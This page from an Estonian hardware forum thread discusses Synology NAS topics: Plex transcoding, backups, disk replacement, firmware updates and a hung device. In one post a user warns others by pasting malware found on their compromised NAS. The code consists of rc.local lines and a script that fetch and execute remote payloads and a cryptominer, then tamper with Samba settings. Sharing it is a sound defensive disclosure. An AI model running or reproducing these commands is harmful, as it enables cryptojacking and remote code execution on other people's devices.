Avaleht
uus teema   vasta Hinnavaatlus »  Serverid / Andmemassiivid / Tulemüürid »  Synology arutelu märgi kõik teemad loetuks
märgi mitteloetuks
vaata eelmist teemat :: vaata järgmist teemat
mine lehele eelmine  1, 2, 3 ... 25, 26, 27 ... 56, 57, 58  järgmine
Hinnavaatlus :: Foorum :: Uudised :: Ärifoorumid :: HV F1 ennustusvõistlus :: Pangalink :: Telekavad :: HV toote otsing
autor
sõnum Saada viide sõbrale.  :: Teata moderaatorile teata moderaatorile
otsing:  
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 00:02:37 vasta tsitaadiga

ufo56 kirjutas:
Hmm, settings-server-transcode ja seal linnuke use hardware transcoding ?


Pole sellist kohta, Ilmselt passi teema... icon_rolleyes.gif
Ehk siis HW Transcode valik puudub.

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 00:04:43 vasta tsitaadiga

Tahad testin DS412+ peal ? On võimalus.
_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 00:07:41 vasta tsitaadiga

ufo56 kirjutas:
Tahad testin DS412+ peal ? On võimalus.


412+ ei evi minu teada vastavad rauda, et HW transcodingut teha.
Pole GPU'd selle prosel. AFAIK toimub HW transcoding üle QuickSynci Intelitel.

Täna ei viitsi rohkem nokkida kah, vaatab homme edasi...võtab võibolla kuuks selle passi siis prooviks... icon_rolleyes.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!


viimati muutis Etz 07.06.2017 00:13:03, muudetud 1 kord
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 00:10:07 vasta tsitaadiga

Ongi nii. Atomi prose. Kohe vaatab mis teisel synol kõhus on.

EDIT: See ka atom. Pead plex passi ikka võtma kuuks.

_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 10:40:17 vasta tsitaadiga

ufo56 kirjutas:
Ongi nii. Atomi prose. Kohe vaatab mis teisel synol kõhus on.

EDIT: See ka atom. Pead plex passi ikka võtma kuuks.


Yep, ilma premiumita (server peab olema samuti claimitud) seda linnukese kohta lihtsalt ei kuvata.
Samas ühe 1080p striimi transkoodimise korral on nüüd prose load ca ~4%... icon_lol.gif

Nüüd siis veel vaja uurida, kuidas selle TV (Selle Firmware on lihtsalt "katki") jaoks saaks DTS > AC3 conversiooni tööle ja elu olekski taas lill... thumbs_up.gif icon_biggrin.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 11:00:48 vasta tsitaadiga

thumbs_up.gif thumbs_up.gif
Pole paha siis.

Mul endal vähe keerulisem kompott, unraid mille seljas siis dockeriga plex. Pole uurinud kas praegune dockeri plexi image tegija (linuxserver.io) plaanib ka HW transcode supporti. Ja veel omaette teema kuidas unraid videokaartidesse suhtub. Samas VM masinatesse saab teha kenasti passtrough. Ja veel 2U kasti videokaardi mahutama kuhugi kuidagi. Ilmselt mingi AMD kaart kuna nvidia piirab kõigil 2 streami peale HW transcode. Väljaarvatud quadro kaardid.

_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 07.06.2017 17:42:07 vasta tsitaadiga

ufo56, Unraid peaks ilusti GPU'dega hakkama saama:

Spoiler Spoiler Spoiler


Huvitav, kas uuemad serveri versioonid kah HW Transcodet teevad? icon_rolleyes.gif
EDIT: Nope, ainult see konkreetne build.

Etz kirjutas:
Samas ühe 1080p striimi transkoodimise korral on nüüd prose load ca ~4%... icon_lol.gif


Sõltuvalt source bitratest, siis jääb sinna kuskile 4-12% vahele, selle konkreetse buildiga.
Mina olen rahul... icon_cool.gif

EDIT: DTS to EAC3 töötab kah... onfire.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
Helseth
HV kasutaja

liitunud: 05.01.2012




sõnum 16.06.2017 22:36:41 vasta tsitaadiga

Küsin, mismoodi te windowsi masinatest oma synology ja qnapide peale automaatseid backupe teete?
Olen ise muidu enamasti teinud lihtsa skripti, mis mountib samba sheeri backupi tegemise ajaks külge, seejärel cwrsync'iga kopeerib vahepeal muudetud failid üle ning lõpus haagib lahti.
Miinuseks on see, et kui tädi maali paneb poole pealt skripti kinni, siis jääb samba sheer mount'ituks.
Mõtlesin, et võimalus oleks otse windowsi masinast rsync'ida qnapi peale. Sai kõvasti üritatud sellist varianti tööle saada, aga qnapi rsyncd on nii ära kohitsetud, et töötab ainult ühe rsync kasutajaga.
Mis variante veel on, et krüptoviiruse korral backupe ka ära krüpteeritaks.
tagasi üles
vaata kasutaja infot saada privaatsõnum
warwas
HV Guru
warwas

liitunud: 06.07.2003



Autoriseeritud ID-kaardiga
sõnum 16.06.2017 22:53:10 vasta tsitaadiga

Endal kasutuses Veeam Agent for Microsoft Windows (endise nimega Veeam Endpoint Backup). Rohkem juttu siin -> https://www.veeam.com/windows-linux-availability-agents.html

Seal saad varundamiseks mõeldud share jaoks eraldi kasutaja/parooli anda. Varundamisprotsessi ajal seda otseselt kuhugi nähtavasse kohta külge ei haagitagi. Saad teha nii kindlatest kataloogidest kui tervest masinast. Viimane variant on eriti hea, kui näiteks ketas kooleb või saadki mingi krüptopasaga pihta. Tõmba ainult masin recovery meedia pealt püsti ja taasta soovitud seis. Proovitud korduvalt, töötab igati edukalt. Alles täna sai üks kaotsi läinud Bitlockeri võtmega masin uuesti kasutatavaks tehtud.
tagasi üles
vaata kasutaja infot saada privaatsõnum
anubis
HV Guru
anubis

liitunud: 08.06.2002



Autoriseeritud ID-kaardiga
sõnum 16.06.2017 23:09:36 vasta tsitaadiga

@warwas thumbs_up.gif thumbs_up.gif beer_yum.gif
tagasi üles
vaata kasutaja infot saada privaatsõnum
Helseth
HV kasutaja

liitunud: 05.01.2012




sõnum 17.06.2017 01:01:27 vasta tsitaadiga

Tundub tõesti rohkete võimalustega, kuid hind tuleb ka päris kõrbe kui 45€ euri küsitakse per masin. Teeb ainuüksi mõne ettevõtte aastase IT-kulutuste eelarve kokku.
tagasi üles
vaata kasutaja infot saada privaatsõnum
warwas
HV Guru
warwas

liitunud: 06.07.2003



Autoriseeritud ID-kaardiga
sõnum 17.06.2017 11:04:23 vasta tsitaadiga

Helseth, krt, ma linkisin Sulle vale lehe. Marketingi tegelased on neil selle koduka nii "kavalalt" teinud.
Mõtlesin tegelikult seda - https://www.veeam.com/windows-endpoint-server-backup-free.html

Ehk siis see sama toode on olemas ka nö. tasuta variandis. Vahe on lihtsalt funktsionaalsuses. Uhkemad asjad on sealt küll puudu aga kõik nö. eluks vajalik on siiski olemas - https://www.veeam.com/veeam_agent_windows_2_0_editions_comparison_en_ds.pdf
Kui on plaan seda ettevõtte kontektsis kasutada, siis hea uudis on see, et v2 tõi eelnevalt valmis sätitud konfiga deploymise võimaluse. Hilisema häälestamise API on kahjuks tasulisse varianti jäänud. Aga siiski edasiminek.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Helseth
HV kasutaja

liitunud: 05.01.2012




sõnum 18.06.2017 11:18:29 vasta tsitaadiga

Tundub, et läheb käiku. thumbs_up.gif
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 12:09:41 vasta tsitaadiga

Vaadake oma Synologyd üle. Ühest Synost avastasin sellise asja siis. Sama ip otsas veel üks Syno ja see oli puhas. Kõik värskemad uuendused peal aga mingi päev tekkis selline protsess nagu "cpuminer". SSH kinni ja kasutajaid vaid mõni ning korralikult paroolid kõigil. Kust või kuidas sisse saadi ei oska öelda. Jälile ei jõudnud sellele.

rc.local alla oli tekkinud siis sellised read. (domeenid olid üsna sarnased, suvalised tähed aga siin muutsin ära)

wget -q http://update.sdgnsaddsfajfsdf.info/upd -O /tmp/updatescript;sh /tmp/updatescript;rm -rf /tmp/updatescript > /dev/null 2>&1
wget -q http://update.sdgnasddsfajfsdf.info/upd -O /tmp/updatescript;sh /tmp/updatescript;rm -rf /tmp/updatescript > /dev/null 2>&1
wget -q http://update.sdgasdsafdsf.pw/upd2 -O /tmp/updatescript2;sh /tmp/updatescript2;rm -rf /tmp/updatescript2 > /dev/null 2>&1
wget -q http://update.sdgasdsafdsf.pw/upd2 -O /tmp/updatescript2;sh /tmp/updatescript2;rm -rf /tmp/updatescript2 > /dev/null 2>&1
wget -q http://update.omsadfg.pw/upd3 -O /tmp/updatescript3;sh /tmp/updatescript3;rm -rf /tmp/updatescript3 > /dev/null 2>&1
wget -q http://update.oasdmfg.pw/upd3 -O /tmp/updatescript3;sh /tmp/updatescript3;rm -rf /tmp/updatescript3 > /dev/null 2>&1


Scripti enda sisu

#!/bin/sh
killall cpuminer
rm -rf /tmp/cpuminer
wget -q http://188.138.109.103/cpuminer -O /tmp/cpuminer
chmod +x /tmp/cpuminer
/tmp/cpuminer&
wget -q http://188.138.109.103/bb -O /tmp/bb;chmod +x /tmp/bb;/tmp/bb
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
if cat /etc/samba/smb.conf | grep "nt pipe support = no" ; then
        echo nm
else
        sed -i '/global/a nt pipe support = no' /etc/samba/smb.conf
fi

if cat /etc/smb.conf | grep "nt pipe support = no" ; then
        echo nm
else
        sed -i '/global/a nt pipe support = no' /etc/smb.conf
fi

if cat /etc/config/smb.conf | grep "nt pipe support = no" ; then
        echo nm
else
        sed -i '/global/a nt pipe support = no' /etc/config/smb.conf
fi
if cat /etc/default_config/smb.conf | grep "nt pipe support = no" ; then
        echo nm
else
        sed -i '/global/a nt pipe support = no' /etc/default_config/smb.conf
fi
ps -ef|grep 'irq.sh' |grep -v grep |cut -c 9-15 |xargs kill -9;
ps -ef|grep 'irqbalan' |grep -v grep |cut -c 9-15 |xargs kill -9;
exit

_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
anubis
HV Guru
anubis

liitunud: 08.06.2002



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 12:17:20 vasta tsitaadiga

Edastasid Synologyle ka?
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 12:34:10 vasta tsitaadiga

security@synology.com

Siia kirjutasin.

_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
-vodafone-
HV Guru
-vodafone-

liitunud: 26.04.2005



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 13:10:19 vasta tsitaadiga

Syno purki kasutati kaevamiseks? icon_eek.gif
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 13:13:54 vasta tsitaadiga

Jah, seda on varem ka olnud. Neti juttude järgi. Kunagi kaevati dogecoine. Kahe päevaga aeti vist üle maailma Synode peale 600k usd kokku.
_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 13:33:46 vasta tsitaadiga

ufo56, kuidas jälile said?
CPU laes ja kõik liikus nagu tatt? icon_rolleyes.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
ufo56
HV Guru
ufo56

liitunud: 18.11.2004



Autoriseeritud ID-kaardiga
sõnum 30.06.2017 15:19:53 vasta tsitaadiga

tsitaat:

CPU laes ja kõik liikus nagu tatt?

Täpselt nii. Mitmendat päeva vaatasin et mingil põhjusel paari serveri backupid üle iSCSI võtavad kuidagi liiga kaua aega.

_________________
 Lae pildid -> pilt.io
tagasi üles
vaata kasutaja infot saada privaatsõnum
timoo
HV vaatleja
timoo

liitunud: 15.06.2009




sõnum 12.07.2017 14:23:48 vasta tsitaadiga

Hetkel DS216j sees üks 4TB-ne ketas. Sooviks selle asendada kahe 10TB kettaga, et ka backup olemas oleks. Kuidas andmeid kõige valutumalt uuele kettale saaks?
Kõlaks loogiliselt, kui hetkel tühja pessa panna 10ne ketas ning andmed üle kanda, kuid kas see ka nii töötab?
tagasi üles
vaata kasutaja infot saada privaatsõnum
anubis
HV Guru
anubis

liitunud: 08.06.2002



Autoriseeritud ID-kaardiga
sõnum 12.07.2017 14:27:58 vasta tsitaadiga

timoo kirjutas:
Hetkel DS216j sees üks 4TB-ne ketas. Sooviks selle asendada kahe 10TB kettaga, et ka backup olemas oleks. Kuidas andmeid kõige valutumalt uuele kettale saaks?
Kõlaks loogiliselt, kui hetkel tühja pessa panna 10ne ketas ning andmed üle kanda, kuid kas see ka nii töötab?


https://www.synology.com/en-global/knowledgebase/DSM/help/DSM/StorageManager/volume_diskgroup_expand_replace_disk

Mhmh
tagasi üles
vaata kasutaja infot saada privaatsõnum
Dijital
HV Guru
Dijital

liitunud: 09.06.2003



Autoriseeritud ID-kaardiga Online
sõnum 17.07.2017 13:13:54 vasta tsitaadiga

Huvitav, et ükspäev mu ustav purk DS214, millel DSM 6.1.2 peal, näitas, et 6.1.2-le on uuendus Update 1. Ei viitsinud kohe tegeleda ning nüüd mõni päev tagasi näitas, et on olemas juba 6.1.3. Mõtlesin, et las tirib siis alla ja uuendab end ära 6.1.3 peale. Huvitaval kombel aga näitas peale uuendust, et on 6.1.2 Update 1 ning et see on uusim ja 6.1.3 enam ei pakugi.
_________________
OBSBOT veebipoe affiliate link / 5% sooduskood: TUIKOTREW
Müüa uus Agon by AOC 610Hz monitor AG246FK6
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
sukelduja
HV Guru
sukelduja

liitunud: 14.06.2007



Autoriseeritud ID-kaardiga
sõnum 17.07.2017 13:28:05 vasta tsitaadiga

Dijital kirjutas:
Huvitav, et ükspäev mu ustav purk DS214, millel DSM 6.1.2 peal, näitas, et 6.1.2-le on uuendus Update 1. Ei viitsinud kohe tegeleda ning nüüd mõni päev tagasi näitas, et on olemas juba 6.1.3. Mõtlesin, et las tirib siis alla ja uuendab end ära 6.1.3 peale. Huvitaval kombel aga näitas peale uuendust, et on 6.1.2 Update 1 ning et see on uusim ja 6.1.3 enam ei pakugi.

Viimase paari kolme nädalaga on juba 3 uuendust tulnud.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Dijital
HV Guru
Dijital

liitunud: 09.06.2003



Autoriseeritud ID-kaardiga Online
sõnum 17.07.2017 13:43:13 vasta tsitaadiga

Mind pani hämmastama just see, et ta ise pakkus küll kõige uuemat, kuid installis ikkagi vanema versiooni ja enam seda uuemat, mida ta enne ka ise pakkus, uuesti ei paku. Saaksin sellest siis aru, kui on mingi viga leitud ja igalt poolt on see uuendus tagasi tõmmatud, kuid kõikides us, de, uk ja global serverites on see siiski manuaalselt alla laaditav.
_________________
OBSBOT veebipoe affiliate link / 5% sooduskood: TUIKOTREW
Müüa uus Agon by AOC 610Hz monitor AG246FK6
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
mikk36
HV Guru
mikk36

liitunud: 21.02.2004




sõnum 18.07.2017 16:27:43 vasta tsitaadiga

Gradual rollout, tõenäoliselt hiljem hakkab uuesti pakkuma seda uusimat.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Dirty Harry
HV Guru
Dirty Harry

liitunud: 05.09.2002



Autoriseeritud ID-kaardiga
sõnum 20.07.2017 12:26:02 vasta tsitaadiga

Synology tugi on ikka tasemel. Enda DS411+ on aastast 2010 aga seni tuleb pidevalt softiuuendusi ja turvalappe. Ning tegu pole enterprice vidinaga, home/SOHO isend. Muidugi vbolla ma nüüd sõnun ära icon_smile.gif aga vägev värk igaljuhul.
tagasi üles
vaata kasutaja infot saada privaatsõnum
jägaja
HV Guru
jägaja

liitunud: 06.08.2004




sõnum 21.07.2017 09:24:25 vasta tsitaadiga

Mark0, Qnap samamoodi veel väljastab uuendusi sama vanale seadmele, aga seade ise on EOL.
Tarkvarauuendusest vähe kasu, kui tänaseks aegunud nadi riistvara igal hetkel piirab
Backup serveriks kõlbab veel.

Sellel synol on vähemalt mälu, mu vanal serveril 256mega

_________________
" Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine."
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 21.07.2017 10:25:48 vasta tsitaadiga

jägaja, DS411+ mälu upgrade pole ka probleem, SO-DIMM...
_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
Dirty Harry
HV Guru
Dirty Harry

liitunud: 05.09.2002



Autoriseeritud ID-kaardiga
sõnum 21.07.2017 11:13:55 vasta tsitaadiga

Just, seetõttu ongi konkreetne mudel endal valitud kuna neid pulki veel leidub (endalgi on 1+1GB). Samas sellest on tegelikult ka pool vaba ning kast teenindab kenasti keskmise rahuliku kodu ära muretult. Just seetõttu on tore, et tootja ikka veel tuge pakub.
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004



Autoriseeritud ID-kaardiga
sõnum 24.07.2017 20:03:32 vasta tsitaadiga

Kindlasti ajuvaba ning loll küsimus aga kas Synology Hybrid Raid lahenduselt võiks eemaldada ketta ning parandada raidi ilma uut ketast lisamata KUI raidis on piisavalt vaba mahtu?
Kõik viitab ainult sellele, et kui üks ketas saba annab, pead asendama KINDLASTI sama suure või suurema kettaga ning alles siis saad raidi parandada.

ST. kui ei saa, siis kõigest varukoopia ning nullist seadistamine vähema arvu ketastega.
Miks ma tahan seda teha, mul on 8 kettaga SHR ning datat on vähemaks jäänud ja pole mõtet 8l kettal seal unnata lasta, seda enam, et kettad on suuremaks läinud ja 5st kettast piisaks täiesti.

Plaan oli 1 kaupa vähemaks tõmmata ja rebuild teha iga kord aga ilmselt on see tehniliselt mitte tehtav.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 24.07.2017 20:18:22 vasta tsitaadiga

indrekp, ei või...nagu ka tavalise RAID'i puhul...kettaid võib alati juurde laduda, aga vähemaks võtta enam niisama lihtsalt ei saa.
SHR tegelikult pole muud, kui tavaline RAID ja LVM volume selle otsas...

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004



Autoriseeritud ID-kaardiga
sõnum 24.07.2017 20:56:50 vasta tsitaadiga

Etz kirjutas:
indrekp, ei või...nagu ka tavalise RAID'i puhul...kettaid võib alati juurde laduda, aga vähemaks võtta enam niisama lihtsalt ei saa.
SHR tegelikult pole muud, kui tavaline RAID ja LVM volume selle otsas...


Olin selles ise peaaaegu kindel aga pidin küsima. Varukoopia tegemine on juba poolepeal icon_biggrin.gif
tagasi üles
vaata kasutaja infot saada privaatsõnum
Some
HV vaatleja

liitunud: 07.11.2001




sõnum 31.07.2017 12:25:41 vasta tsitaadiga

Ise kasutan Drobo Prod-d ja see paraneb küll mahu olemasolul ise. Juba kaks 2TB ketast lennanud ja olen asendamata jätnud, sest ainult kolmandik massiivist täis nende aastatega. Ja et TB läheb iga aastaga aina odavamaks, siis ma upgradega eriti ei kiirusta.
tagasi üles
vaata kasutaja infot saada privaatsõnum
mikk36
HV Guru
mikk36

liitunud: 21.02.2004




sõnum 31.07.2017 14:47:29 vasta tsitaadiga

Some, mitu ketast kokku on seal sees?
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 21:53:18 vasta tsitaadiga

Mismoodi Synology kastile viisakalt füüsilist shutdowni/restarti saab teha?
SMART test jäi rippuma, üks ketastest on kutu...ligi aga enam kuskilt ei saa... icon_neutral.gif

Isegi SSH peale ei võta toru, sessioon jääb lihtsalt rippuma.
Toitenupule kah ei reageeri...power LED jääb vilkuma ning kast on endiselt "koomas"... icon_confused.gif

Vigase ketta kiskusin välja, ketta tuli muidugi endiselt vilgub ja seis suht sama.

Enne mölises midagi Bad sectorite ja IO errorite kohta ühel kettal, mõtlesin et teeks kettatesti ja saadaks ketta garantiisse...aga näed... icon_lol.gif
Enam ei julge WD Red'e soovitada kellelegi samuti, viimasel ajal on mingi mass suremine mul tekkinud, kettad ise suht uued...alla aasta vanad.

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:01:38 vasta tsitaadiga

Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:02:56 vasta tsitaadiga

indrekp kirjutas:
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast.


Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud... icon_rolleyes.gif
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown...

Hoidsin natuke pikemalt, ei mingit piiksu...forced shutdown tehti hoopis... icon_evil.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!


viimati muutis Etz 31.07.2017 22:04:11, muudetud 1 kord
tagasi üles
vaata kasutaja infot saada privaatsõnum
warwas
HV Guru
warwas

liitunud: 06.07.2003



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:03:51 vasta tsitaadiga

Etz kirjutas:
Isegi SSH peale ei võta toru, sessioon jääb lihtsalt rippuma.
Toitenupule kah ei reageeri...power LED jääb vilkuma ning kast on endiselt "koomas"... icon_confused.gif

Vigase ketta kiskusin välja, ketta tuli muidugi endiselt vilgub ja seis suht sama.

Enne mölises midagi Bad sectorite ja IO errorite kohta ühel kettal, mõtlesin et teeks kettatesti ja saadaks ketta garantiisse...aga näed... icon_lol.gif

Mul oli omal ühe kastiga, kus ka veidi hapud kettad sees olid, kunagi suht samad sümptomid. Siis ei aidanud tõesti miski muu, kui juhme seinast tõmbamine.
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:05:41 vasta tsitaadiga

Etz kirjutas:
indrekp kirjutas:
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast.


Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud... icon_rolleyes.gif
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown...


Kui seda piixu ei käi siis on vist tõesti oma ketastega korralikult käpuli.
Saba seinast võib muidugi lõppeda korraliku krahhiga ja varukoopia aitab.

PS. mul oli just sarnane keiss aga veidi teistmoodi. uuendus mingile 6.1.x vms versioonile. Läks peale seda rebooti ja jäigi vilkuma. Kettaid järele ei võtnud.
Google aitas, pane kinni, kettad välja, lase käima, annab veateate, lükka kettad sisse ja siis uus soft peale, raid säilis koos andmetega.

võib olla see:
https://www.synology.com/en-uk/knowledgebase/DSM/tutorial/General/What_can_I_do_if_the_STATUS_LED_keeps_flashing_in_orange


viimati muutis indrpo 31.07.2017 22:11:43, muudetud 1 kord
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:06:08 vasta tsitaadiga

warwas, nohjah, mul hetkel asi nii lõppeski... icon_lol.gif

Suhteliselt sitt case, siiani polnud mul ainumaski WD Red ära surnud, nüüd läksid kaks tükki järjest...

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
warwas
HV Guru
warwas

liitunud: 06.07.2003



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:10:54 vasta tsitaadiga

indrekp kirjutas:
Etz kirjutas:
indrekp kirjutas:
Etz, hoiad poweri nuppu pikalt all kuni käib kriiiiiks, ja siis ta vaikselt vilgutab pwr tuld ning teeb 30sek jooksul tuvalise shut downi.
päris jõuga offi lasta võid ju veel pikema hoidmisega või saba seinast.


Kui pikalt seda power buttonit all hoida tuleks, 10 seki jooksul ta igatahes ei piiksatanud... icon_rolleyes.gif
Power tuluke muidu vilgub nüüd küll...aga mida ei toimu on shutdown...

Kui seda piixu ei käi siis on vist tõesti oma ketastega korralikult käpuli.
Saba seinast võib muidugi lõppeda korraliku krahhiga ja varukoopia aitab.

Eks serial konsool tooks tõe päevavalgele, aga mul on tunne, et pärast seda kriiksu, kui hakatakse teenuseid kokku korjama ja mingi deemoni killimine rippu jääb, siis jääb ka see tuli aegade lõpuni vilkuma. SSH on arvatavasti üks esimesi, kes tudule saadetakse. Saab loota ainult seda, et igast cache'id jms. mälus olevad andmed on ilusti ketastele maha kirjutatud


viimati muutis warwas 31.07.2017 22:12:11, muudetud 2 korda
tagasi üles
vaata kasutaja infot saada privaatsõnum
Dirty Harry
HV Guru
Dirty Harry

liitunud: 05.09.2002



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:11:57 vasta tsitaadiga

Osadel Synologydel peaks olema lausa eraldi välja toodud serial port, osadel on võimalik seda kasutada kui kasti lahti kisud.

https://wrgms.com/recovering-a-failed-synology-diskstation-ds2xx-serial/

EDIT: aeglane olen, vahepeal on n+1 postitust tulnud juba. icon_smile.gif
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 31.07.2017 22:13:13 vasta tsitaadiga

warwas kirjutas:
Eks serial konsool tooks tõe päevavalgele, aga mul on tunne, et pärast seda kriiksu, kui hakatakse teenuseid kokku korjama jääb mingi deemoni killimine rippu jääb, siis jääb ka see tuli aegade lõpuni vilkuma. SSH on arvatavasti üks esimesi, kes tudule saadetakse. Saab loota ainult seda, et igast cache'id jms. mälus olevad andmed on ilusti ketastele maha kirjutatud


SSH suri tegelikult ära koos Weebiinterfacega ja enne kui ma seda Power nuppu üldse torkima läksin...
Õnneks on mul olulisest, nii onsite kui offsite backup. icon_cool.gif

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
tagasi üles
vaata kasutaja infot saada privaatsõnum
Markos
HV veteran

liitunud: 10.04.2002




sõnum 01.08.2017 23:11:09 vasta tsitaadiga

Synology sees on tavaline md/lvm, kui asi ongi hapu, võid need kettad pärast tavalise arvuti külge panna ja vaadata, kas on midagi päästa või mitte. jbodi ja mirrori puhul eriti lihtne, hybridi puhul natuke keerulisem.
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga
sõnum 02.08.2017 08:21:50 vasta tsitaadiga

Markos kirjutas:
Synology sees on tavaline md/lvm, kui asi ongi hapu, võid need kettad pärast tavalise arvuti külge panna ja vaadata, kas on midagi päästa või mitte. jbodi ja mirrori puhul eriti lihtne, hybridi puhul natuke keerulisem.


Jah tean, aga kuna array'st suri ära ainult 1 ketas, siis pole ka vajadust midagi päästa, läks uus ketas (Ordi vahetas ketta mõne tunniga ringi) sisse ja repair.
Lisaks on mul olulisest kraamist nii onsite kui offsite backup, seega ei viitsisks ilmselt isegi täieliku hävingu korral sellega väga tegeleda.

Ainus asi, mida mul varem juhtunud pole, on ssee et kogu kast ära minestab kui üks ketastest hapuks läheb.
Peale jõuga tehtud shutdowni, buutis igatahes ilm selle hapu kettata ilusti üles ja hakkas consistency checki tegema.

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!


viimati muutis Etz 02.08.2017 09:31:51, muudetud 2 korda
tagasi üles
vaata kasutaja infot saada privaatsõnum
Markos
HV veteran

liitunud: 10.04.2002




sõnum 02.08.2017 08:41:48 vasta tsitaadiga

